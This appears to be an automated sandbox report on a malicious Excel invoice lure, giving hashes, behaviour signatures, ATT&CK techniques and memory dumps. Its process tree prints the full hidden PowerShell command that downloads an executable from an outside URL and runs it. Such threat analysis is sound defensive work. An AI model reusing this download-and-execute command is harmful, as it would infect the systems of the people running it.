Overview

overview

10

Static

static

8

lnvoice_237647.xls

windows7_x64

10

lnvoice_237647.xls

windows10_x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    09-07-2021 12:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    lnvoice_237647.xls

  • Size

    96KB

  • MD5

    e952df96ed8a0dce47a87203a292bb4f

  • SHA1

    163172f5016c075248b0aea90bd1bd1b849db1c6

  • SHA256

    4b84c537c317a51d6c6b2de361e7f6251585e7e2486fdc4ed4bff2460facba69

  • SHA512

    7ad610f815f09943186efea29bba36c8031fd5b2a53c45fc449b7b5ccd82d16907e6dcc7e47794d4a25ae444f12bf0fcc582346204816a5f5fd627ea60eb6f26

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://invoice-acc.com/ss/3loyaSLADo1ZNLp.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\lnvoice_237647.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:752
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" "/c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -C (New-Object System.Net.WebClient).DownloadFile('https://invoice-acc.com/ss/3loyaSLADo1ZNLp.exe','cc.exe');Start-Process 'cc.exe'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -C (New-Object System.Net.WebClient).DownloadFile('https://invoice-acc.com/ss/3loyaSLADo1ZNLp.exe','cc.exe');Start-Process 'cc.exe'"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:648

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/332-64-0x0000000000000000-mapping.dmp
    Download
  • memory/648-70-0x0000000004732000-0x0000000004733000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-65-0x0000000000000000-mapping.dmp
    Download
  • memory/648-71-0x0000000002550000-0x0000000002551000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-75-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-72-0x0000000004790000-0x0000000004791000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-66-0x0000000076661000-0x0000000076663000-memory.dmp
    Filesize

    8KB

    Download
  • memory/648-67-0x0000000001F00000-0x0000000001F01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-68-0x00000000047F0000-0x00000000047F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-69-0x0000000004730000-0x0000000004731000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-106-0x0000000006540000-0x0000000006541000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-105-0x0000000006530000-0x0000000006531000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-91-0x00000000063F0000-0x00000000063F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-90-0x00000000062C0000-0x00000000062C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-76-0x0000000005650000-0x0000000005651000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-81-0x0000000005710000-0x0000000005711000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-82-0x0000000006140000-0x0000000006141000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-89-0x0000000006240000-0x0000000006241000-memory.dmp
    Filesize

    4KB

    Download
  • memory/752-61-0x0000000071671000-0x0000000071673000-memory.dmp
    Filesize

    8KB

    Download
  • memory/752-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/752-63-0x0000000005E90000-0x0000000005E92000-memory.dmp
    Filesize

    8KB

    Download
  • memory/752-60-0x000000002FF61000-0x000000002FF64000-memory.dmp
    Filesize

    12KB

    Download